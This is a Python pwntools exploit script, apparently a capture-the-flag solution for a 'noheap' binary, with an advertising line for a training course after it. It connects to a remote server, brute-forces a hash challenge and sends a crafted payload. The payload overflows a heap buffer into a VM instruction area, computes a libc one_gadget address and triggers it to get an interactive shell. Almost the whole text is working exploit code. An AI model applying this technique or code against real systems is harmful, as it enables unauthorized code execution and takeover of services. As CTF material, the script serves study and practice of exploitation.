from pwn import * # context.log_level = 'debug' target_file = './noheap' # io = process(['./linux_server64'], aslr=False) # io = process([target_file], aslr=False) io = remote('139.199.99.130', 8989) def x_hash(s): v_hash = 0 for c in s: v_hash = (v_hash * 131 + ord(c)) & 0xFFFFFFFF return v_hash def x_bf_hash(v_hash): for i0 in xrange(43): for i1 in xrange(43): for i2 in xrange(43): for i3 in xrange(43): seed = 0 seed = (seed << 8) + i0 + 48 seed = (seed << 8) + i1 + 48 seed = (seed << 8) + i2 + 48 seed = (seed << 8) + i3 + 48 v = seed s = '' v = (214013 * v + 2531011) & 0xFFFFFFFF s += p32(v) v = (214013 * v + 2531011) & 0xFFFFFFFF s += p32(v) if x_hash(s) == v_hash: return s return '' def x_check_hash(): io.recvuntil('Hash:') v_hash = int(io.recvline().strip(), 16) io.sendline(x_bf_hash(v_hash)) return def exploit(): x_check_hash() libc_offset = 0xF72C0 # write+10 one_gadget = 0x4526a vm_data_offset = 0x30 delta = libc_offset - one_gadget buf = '' buf += '1'*(0x203140-0x2030C0) vm_inst_offset = len(buf) # vm_inst start # vm_execution continues at offset 0x0E after first v_call buf += p8(0x02)*13+p8(0x01)+p8(0x00) # one_gadget: [rsp+30]==NULL # read 0 ([rbp-48]==0) buf += p8(0x01)+p8(0x01)+p8(0x13) # write 0 buf += p8(0x01)+p8(0x03)+p8(0x14) # read libc_addr buf += p8(0x01)+p8(0x0D)+p8(0x13) # read delta from vm_data buf += p8(0x01)+p8(vm_data_offset+0x00)+p8(0x04) # sub delta buf += p8(0x05) # write one_gadget buf += p8(0x01)+p8(0x0D)+p8(0x14) # call one_gadget buf += p8(0x16) buf = buf.ljust(vm_inst_offset + vm_data_offset, '\x00') buf += p64(delta) # malloc, overflow vm_inst io.sendafter('>> ', '1') io.sendafter('Size :', '0') io.sendafter('Content :', buf) # free, call one_gadget io.sendafter('>> ', '3') io.interactive() return exploit()
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
